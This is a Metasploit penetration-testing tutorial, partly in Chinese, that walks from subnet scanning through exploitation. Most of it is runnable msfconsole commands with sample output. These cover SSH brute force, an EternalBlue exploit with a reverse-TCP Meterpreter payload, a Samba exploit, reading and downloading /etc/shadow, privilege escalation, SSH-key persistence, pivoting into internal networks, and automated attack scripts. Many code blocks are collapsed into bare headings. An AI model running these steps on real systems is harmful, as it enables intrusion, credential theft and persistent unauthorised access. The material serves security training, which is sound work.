Metasploit framework in-depth practice - from scanning to getshell

# Payload 分为三大类: # 1. Singles (单一载荷) — 独立运行，体积小# 命名格式: <platform>/[arch]/<single># 例如: linux/x64/shell_reverse_tcp # 2. Stagers (传输器) — 建立连接通道，下载 Stage# 命名格式: 带 '/' 分隔# 例如: windows/x64/meterpreter/reverse_tcp#                              ^stager # 3. Stages (传输阶段) — 通过 Stager 下载的大型载荷# 如 Meterpreter、VNC 注入等 # 区分方法:# shell_reverse_tcp     → Single (无 '/' 分隔)# shell/reverse_tcp     → Staged (有 '/' 分隔 stager)# meterpreter/reverse_tcp → Staged Meterpreter

# 启动 Metasploit（首次启动需要初始化数据库）sudo msfdb initmsfconsole # Check database connection # Core navigation commands # Workspace management (isolating different projects) ### Module search techniques ```bash# 基本搜索msf6 > search eternalbluemsf6 > search apachemsf6 > search type:exploit platform:linux # 高级搜索过滤msf6 > search type:exploit name:smbmsf6 > search type:auxiliary name:scannermsf6 > search cve:2021-44228              # 按CVE搜索msf6 > search platform:linux type:exploit rank:excellentmsf6 > search author:hdm # 搜索结果字段说明# Name: 模块名称# Disclosure Date: 漏洞公开日期# Rank: 可靠性等级 (excellent > great > good > normal > average > low)# Check: 是否支持 check 命令（非破坏性检测） # 在 Exploit-DB 中搜索（离线）searchsploit eternalbluesearchsploit -m 42315           # 复制 exploit 到当前目录

# TCP 端口扫描msf6 > use auxiliary/scanner/portscan/tcpmsf6 auxiliary(tcp) > set RHOSTS 192.168.1.0/24msf6 auxiliary(tcp) > set PORTS 1-1000msf6 auxiliary(tcp) > set THREADS 50msf6 auxiliary(tcp) > run # SYN scan ### Service version detection ```bash# SMB 版本探测msf6 > use auxiliary/scanner/smb/smb_versionmsf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24msf6 auxiliary(smb_version) > run # SSH 版本探测msf6 > use auxiliary/scanner/ssh/ssh_versionmsf6 auxiliary(ssh_version) > set RHOSTS 192.168.1.0/24msf6 auxiliary(ssh_version) > run # FTP 版本探测msf6 > use auxiliary/scanner/ftp/ftp_versionmsf6 auxiliary(ftp_version) > set RHOSTS 192.168.1.0/24msf6 auxiliary(ftp_version) > run # HTTP 服务器信息msf6 > use auxiliary/scanner/http/http_versionmsf6 auxiliary(http_version) > set RHOSTS 192.168.1.0/24msf6 auxiliary(http_version) > run # 查看数据库中收集到的信息msf6 > hosts                    # 查看发现的主机msf6 > services                 # 查看发现的服务msf6 > services -p 445          # 过滤特定端口msf6 > vulns                    # 查看发现的漏洞

# SMB 共享枚举msf6 > use auxiliary/scanner/smb/smb_enumsharesmsf6 auxiliary(smb_enumshares) > set RHOSTS 192.168.1.100msf6 auxiliary(smb_enumshares) > run # SMB user enumeration # FTP anonymous login detection # SNMP enumeration # HTTP directory scan ### Vulnerability detection ```bash# MS17-010 (EternalBlue) 漏洞检测msf6 > use auxiliary/scanner/smb/smb_ms17_010msf6 auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.0/24msf6 auxiliary(smb_ms17_010) > run # Shellshock 漏洞检测msf6 > use auxiliary/scanner/http/apache_mod_cgi_bash_envmsf6 auxiliary(apache_mod_cgi_bash_env) > set RHOSTS 192.168.1.100msf6 auxiliary(apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/msf6 auxiliary(apache_mod_cgi_bash_env) > run # SSH 暴力破解msf6 > use auxiliary/scanner/ssh/ssh_loginmsf6 auxiliary(ssh_login) > set RHOSTS 192.168.1.100msf6 auxiliary(ssh_login) > set USERNAME rootmsf6 auxiliary(ssh_login) > set PASS_FILE /usr/share/wordlists/rockyou.txtmsf6 auxiliary(ssh_login) > set STOP_ON_SUCCESS truemsf6 auxiliary(ssh_login) > set THREADS 10msf6 auxiliary(ssh_login) > run

# 1. 扫描目标网段，发现开放 445 端口的主机msf6 > db_nmap -sS -sV -p 445 192.168.1.0/24 # 2. Confirm MS17-010 vulnerability # [+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010! ### Step 2: Configure and execute the exploit ```bash# 3. 使用 EternalBlue 利用模块msf6 > use exploit/windows/smb/ms17_010_eternalblue # 4. 查看模块信息msf6 exploit(ms17_010_eternalblue) > info # 5. 查看并配置选项msf6 exploit(ms17_010_eternalblue) > show options # 6. 设置目标 IPmsf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100 # 7. 设置攻击载荷（Meterpreter）msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp # 8. 设置回连地址msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50msf6 exploit(ms17_010_eternalblue) > set LPORT 4444 # 9. 可选：使用 check 命令验证（非破坏性）msf6 exploit(ms17_010_eternalblue) > check # 10. 执行攻击msf6 exploit(ms17_010_eternalblue) > exploit # [*] Started reverse TCP handler on 192.168.1.50:4444# [*] Sending exploit packet...# [*] Sending stage (200774 bytes) to 192.168.1.100# [*] Meterpreter session 1 opened# meterpreter >

# 利用 Samba is_known_pipename 漏洞msf6 > use exploit/linux/samba/is_known_pipenamemsf6 exploit(is_known_pipename) > set RHOSTS 192.168.1.100msf6 exploit(is_known_pipename) > set PAYLOAD linux/x64/shell_reverse_tcpmsf6 exploit(is_known_pipename) > set LHOST 192.168.1.50msf6 exploit(is_known_pipename) > set TARGET 3msf6 exploit(is_known_pipename) > exploit

# 系统信息meterpreter > sysinfo           # 系统信息meterpreter > getuid            # 当前用户meterpreter > getpid            # 当前进程IDmeterpreter > ps                # 列出进程meterpreter > shell             # 进入系统 shellmeterpreter > exit              # 退出 shell 回到 meterpreter # 文件操作meterpreter > pwd               # 当前目录meterpreter > ls                # 列出文件meterpreter > cd /tmp           # 切换目录meterpreter > cat /etc/passwd   # 读取文件meterpreter > download /etc/shadow /tmp/shadow    # 下载文件meterpreter > upload /tmp/tool.sh /tmp/           # 上传文件meterpreter > edit /tmp/file.txt                  # 编辑文件meterpreter > mkdir /tmp/test                     # 创建目录meterpreter > rm /tmp/test.txt                    # 删除文件 # 网络信息meterpreter > ipconfig / ifconfig    # 网络接口meterpreter > netstat                # 网络连接meterpreter > route                  # 路由表meterpreter > arp                    # ARP 表meterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.20  # 端口转发

# 检查权限meterpreter > getuidmeterpreter > getsystem          # 尝试自动提权 # Use local privilege escalation module msf6 > use post/multi/recon/local_exploit_suggestermsf6 post(local_exploit_suggester) > set SESSION 1msf6 post(local_exploit_suggester) > run # Use specific privilege escalation modules as recommended ### Session management ```bash# 后台化当前会话meterpreter > background# 或按 Ctrl+Z # 查看所有会话msf6 > sessionsmsf6 > sessions -l              # 列出所有会话 # 进入指定会话msf6 > sessions -i 1            # 进入会话1 # 在会话上运行单个命令msf6 > sessions -C "sysinfo" -i 1 # 升级 Shell 到 Meterpretermsf6 > sessions -u 1            # 将普通 shell 升级为 meterpreter # 结束会话msf6 > sessions -k 1            # 终止会话1msf6 > sessions -K              # 终止所有会话 # 多会话管理msf6 > sessions -l# Active sessions# ===============# Id  Type                   Information              Connection# --  ----                   -----------              ----------# 1   meterpreter x64/linux  root @ target1           192.168.1.50:4444 -> 192.168.1.100:41832# 2   shell x64/linux                                  192.168.1.50:4445 -> 192.168.1.101:39211

# 收集系统信息msf6 > use post/linux/gather/enum_systemmsf6 post(enum_system) > set SESSION 1msf6 post(enum_system) > run # Collect network information # Collect user and password hashes # Find sensitive files # Collect SSH credentials # Database credential collection ### Privilege escalation module ```bash# 本地提权建议msf6 > use post/multi/recon/local_exploit_suggestermsf6 post(local_exploit_suggester) > set SESSION 1msf6 post(local_exploit_suggester) > set SHOWDESCRIPTION truemsf6 post(local_exploit_suggester) > run # 常见 Linux 提权模块msf6 > use exploit/linux/local/cve_2022_0847_dirtypipemsf6 > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexecmsf6 > use exploit/linux/local/sudo_baron_sameditmsf6 > use exploit/linux/local/overlayfs_priv_esc

# SSH 密钥持久化msf6 > use post/linux/manage/sshkey_persistencemsf6 post(sshkey_persistence) > set SESSION 1msf6 post(sshkey_persistence) > set USERNAME rootmsf6 post(sshkey_persistence) > run # Cron persistence # Service persistence ### Intranet routing and springboard ```bash# 添加路由（通过已控主机访问内网）meterpreter > run autoroute -s 10.10.10.0/24 # 或在 msf 中手动添加msf6 > route add 10.10.10.0/24 1    # 通过 session 1 # 查看路由表msf6 > route print # 设置 SOCKS 代理msf6 > use auxiliary/server/socks_proxymsf6 auxiliary(socks_proxy) > set SRVPORT 1080msf6 auxiliary(socks_proxy) > set VERSION 5msf6 auxiliary(socks_proxy) > run -j # 现在可以通过代理扫描内网# 配置 proxychains 使用 socks5 127.0.0.1 1080# proxychains nmap -sT -Pn 10.10.10.0/24 # 通过跳板扫描内网msf6 > use auxiliary/scanner/portscan/tcpmsf6 auxiliary(tcp) > set RHOSTS 10.10.10.0/24msf6 auxiliary(tcp) > set PORTS 22,80,443,445,3389msf6 auxiliary(tcp) > set THREADS 20msf6 auxiliary(tcp) > run

# 查看所有可用 Payloadmsfvenom -l payloads # View all available encoders # View all output formats # === Linux Payload === # Linux Rebound Shell (ELF) # Linux Meterpreter (ELF) # === Web Payload === # PHP bounce shell # Python bounce shell # JSP bounce shell # WAR package (for Tomcat) # ASP bounce shell # === Windows Payload === # Windows Meterpreter (EXE) # Windows Shellcode (for buffer overflow) # === Encoding Bypass === # Encoding using shikata_ga_nai (multiple iterations) # Multiple coding # exclude bad characters ### Execute the payload on the target ```bash# 攻击机设置监听msfconsole -qmsf6 > use exploit/multi/handlermsf6 exploit(handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcpmsf6 exploit(handler) > set LHOST 0.0.0.0msf6 exploit(handler) > set LPORT 4444msf6 exploit(handler) > exploit -j    # -j 后台运行 # 目标机执行 Payloadchmod +x meterpreter.elf./meterpreter.elf # 攻击机收到连接# [*] Meterpreter session 1 openedmsf6 > sessions -i 1

# 创建扫描脚本 scan.rccat > scan.rc << 'EOF'use auxiliary/scanner/smb/smb_ms17_010set RHOSTS 192.168.1.0/24set THREADS 50run use auxiliary/scanner/smb/smb_versionset RHOSTS 192.168.1.0/24set THREADS 50run use auxiliary/scanner/ssh/ssh_versionset RHOSTS 192.168.1.0/24set THREADS 50runEOF # Execute scan script ### Automated exploit scripts ```bash# 创建利用脚本 exploit.rccat > exploit.rc << 'EOF'use exploit/windows/smb/ms17_010_eternalblueset PAYLOAD windows/x64/meterpreter/reverse_tcpset RHOSTS 192.168.1.100set LHOST 192.168.1.50set LPORT 4444exploit -j -z # 等待会话建立后自动执行后渗透use post/multi/recon/local_exploit_suggesterset SESSION 1runEOF # 执行msfconsole -r exploit.rc

# 创建后渗透脚本 post.rccat > post.rc << 'EOF'# 系统信息收集use post/linux/gather/enum_systemset SESSION 1run # Network information # Password hash # Configuration file msfconsole -r post.rc

# 录制操作（保存为 Resource Script）msf6 > makerc /tmp/my_session.rc # 在 msfconsole 中加载 Resource Scriptmsf6 > resource /tmp/my_session.rc # 启动时加载msfconsole -r /tmp/my_session.rc

# ====== 阶段一：信息收集 ======msfconsole -q # Initialize workspace # View scan results # ====== Phase 2: Vulnerability Discovery ====== # ====== Phase Three: Vulnerability Exploitation ====== # ====== Stage 4: Post-infiltration ====== # Upload tool # ====== Stage Five: Lateral Movement ====== # ====== Stage 6: Data Export ====== ## Security recommendations and defensive measures 1. **Timely patching**: Metasploit mostly exploits known vulnerabilities. Timely updating of systems and software can prevent the vast majority of attacks. ## Summarize This article completely demonstrates the entire process of Metasploit Framework from architectural design to practical utilization. We started with the module system of Metasploit and learned in depth how to use msfconsole, information collection module, vulnerability exploitation process (taking EternalBlue as an example), Meterpreter session management, post-exploitation module, MSFvenom Payload generation and Resource Script automated attacks. Metasploit is the "Swiss Army Knife" of penetration testing. Mastering it can greatly improve the efficiency and depth of penetration testing. However, tools are only means. Understanding vulnerability principles, attack chain logic and defense ideas is the core competitiveness of security practitioners. This series of penetration testing articles has come to an end. I hope these six articles can help you establish a complete penetration testing knowledge system and continue to hone your skills and improve your capabilities within the scope of legal authorization.